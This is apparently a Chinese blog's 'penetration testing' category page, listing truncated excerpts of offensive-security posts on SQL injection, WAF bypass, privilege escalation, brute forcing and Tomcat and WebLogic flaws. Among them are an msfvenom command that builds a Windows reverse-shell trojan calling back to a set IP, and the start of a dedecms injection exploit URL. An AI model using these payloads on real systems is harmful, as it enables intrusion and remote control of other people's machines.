随笔分类 - 渗透测试
各种渗透经验
    
摘要:测试环境:windows 10 道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的XX饥渴难耐了。但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解带。 0x01 凭据管理器中查看Windows凭据: TERMSRV/1xx.xxx.xxx.xx2
        阅读全文
                
摘要:#coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' reload(sys) sys.setdefaultencoding(type) IpFile=file('./weblogic1.txt') #IP列表 fp= codecs.open("./weblogic1_success.txt...
        阅读全文
                
摘要:一、漏洞概述 Ubuntu 16.04 版本且unprivileged_bpf_disable 权限没有关闭的情况下就会存在 提权漏洞查看方式:1,cat /proc/version 查看系统版本 2,查看是否存在unprivileged_bpf_disable文件,如果存在该文件,查看文件内容是否
        阅读全文
                
摘要:sql.php?sql=1'报错信息为:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to 
        阅读全文
                
摘要:内网渗透的时候有点用处,可以检测MS17-010的漏洞并获取操作系统信息,配合BURP可批量检测,纯socket发包,无需其他扩展。 用法很简单:http://127.0.0.1/ms17-010.php?host=10.211.55.10贴张图:
        阅读全文
                
摘要:payload的几个常用生成 payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe// -p < pay
        阅读全文
                
摘要:漏洞描述 【漏洞预警】Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html 漏洞作者 iswin from 360-sg-lab (360观星实验室) 漏洞等级 高 漏洞复现
        阅读全文
                
摘要:sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击
        阅读全文
                
摘要:php这个函数不算冷门第一个参数是保存的文件名,如果已存在则报错停止第二个参数是内容,可以是字符串,也可以使用file_get_contents获取一个马子内容其实不算什么冷知识了,只是有时候一句话会被拦截,用这个会直接生成一个大马,而且本身是没有什么特征的除非杀软直接监控的文件写入,换个加密马就行
        阅读全文
                
摘要:大家搞内网或者C段渗透测试的时候可能遇到很多时候需要对大批的主机进行精确爆破,这时候BruteSpray就派上用场了。 BruteSpray是一款基于nmap扫描输出的gnmap/XML文件.自动调用Medusa对服务进行爆破(Medusa美杜莎 是一款端口爆破工具,速度比Hydra九头蛇快)。 B
        阅读全文
                
摘要:[通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1 /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnI
        阅读全文
                
摘要:简介 安全测试工具可能含有攻击性,请谨慎适用于安全教学及学习用途,禁止非法利用! EvilFoca是Windows环境下基于.NET FrameWork的一款轻量级的劫持测试工具。与BackTrack和Kali_Linux下复杂的命令相比,EvilFoca更加小巧,轻便,简单,但其效果更加显著高效。
        阅读全文
                
摘要:原文链接:https://www.t00ls.net/viewthread.php?tid=39343
        阅读全文
                
摘要:*原创作者:piece of the past,本文属Freebuf原创奖励计划,未经许可禁止转载 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。一下是我总结的
        阅读全文
                
摘要:旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell? 作者:倾旋email:payloads@aliyun.com投稿联系:service@cora-lab.org 原文地址:http://blog.cora-lab.org/287.html 例外
        阅读全文
                
摘要:前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。 相关知识点总结如下: 免
        阅读全文
                
摘要:先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com; Author:Tr3jer_CongRong Blog:www.Thinkings.org 第一篇《【独家连载】我的WafB
        阅读全文
                
摘要:0x00 前言 玩waf当然也要讲究循序渐进,姊妹篇就写文件上传好了,感觉也就SQLi和Xss的WafBypass最体现发散性思维的,而文件上传、免杀、权限提升这几点的Bypass更需要的是实战的经验。本文内容为沉淀下来的总结以及一些经典案例。想到哪写到哪,所以可能不是很全。创造姿势不易,且行且珍惜
        阅读全文
                
摘要:原帖地址:https://xianzhi.aliyun.com/forum/read/349.html 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的。 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵。 但是积累姿
        阅读全文
                
摘要:sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 原文:http://drops.wooyun.org/tips/143 当给sqlmap这么一个url (http://192.168.136.131/sqlmap/mysql/get_int.ph
        阅读全文
                
 
                    
                

 浙公网安备 33010602011771号
浙公网安备 33010602011771号